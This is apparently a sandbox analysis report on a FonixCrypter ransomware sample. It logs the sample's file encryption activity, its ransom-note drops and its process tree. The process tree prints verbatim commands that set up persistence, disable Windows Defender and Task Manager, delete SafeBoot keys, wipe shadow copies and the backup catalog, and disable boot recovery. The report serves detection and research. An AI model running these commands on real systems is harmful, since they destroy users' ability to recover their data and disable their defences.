Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02423_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21366_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115867.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\weather.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\VBENDF98.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ICE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\EXLIRMV.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0214948.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00726_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02094_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\info.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153093.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01568_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Services\verisign.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00184_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00921_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107446.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\SPACER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PULLQUOTEBB.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot_lrg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\42.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\browser\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe"C:\Users\Admin\AppData\Local\Temp\de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Drops startup file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
PID:1100 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %temp%/FonixCrypter.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\Users\Admin\AppData\Local\Temp/FonixCrypter.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f2⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f3⤵
- Adds Run entry to start application
PID:1308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f2⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f3⤵
- Adds Run entry to start application
PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f2⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f3⤵
- Adds Run entry to start application
PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f2⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f3⤵
- Adds Run entry to start application
PID:304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:308 -
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:272 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\SysWOW64\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:1556
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c vssadmin Delete Shadows /All /Quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet/ & icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵PID:812
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin Delete Shadows /All /Quiet3⤵PID:540
-
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:548
-
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\SysWOW64\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Modifies file permissions
PID:1456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy Cpriv.key %appdata%\Cpriv.key2⤵PID:304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy Cpub.key %appdata%\Cpub.key2⤵PID:984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy SystemID %appdata%\SystemID2⤵PID:272
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:2028
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:528